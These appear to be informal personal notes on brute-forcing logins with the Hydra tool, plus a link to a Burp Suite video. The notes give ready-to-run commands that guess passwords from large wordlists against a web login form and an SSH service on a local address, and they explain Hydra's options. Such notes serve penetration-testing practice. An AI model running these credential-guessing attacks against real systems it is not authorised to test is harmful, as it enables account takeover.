brup suite for find tag with proxy tech link = > https://www.youtube.com/watch?v=-CMBoJ60K1A&t=320s -------------------------------------- for website attack => sudo hydra -L userPath -P passPath -u -f [address] -s Port http-post-form "/login.php:username=^USER^&password=^PASS^:f= hydra -L /home/simrakhsh/Downloads/usernames.txt -P /home/simrakhsh/Downloads/10-million-password-list-top-1000000.txt -u -f -s 55 ssh://192.168.88.2 --------------------------------------- hydra [-l login][-L File] [-p pass][-P file] [-u] [-f] [IP address][-s Port][MODULE] [url]:[from parameters]:[condition string] -l :username -L :user list -p :pass -P :pass list -u :every user -f :stop on first find -s : Port MODULE : attack Mode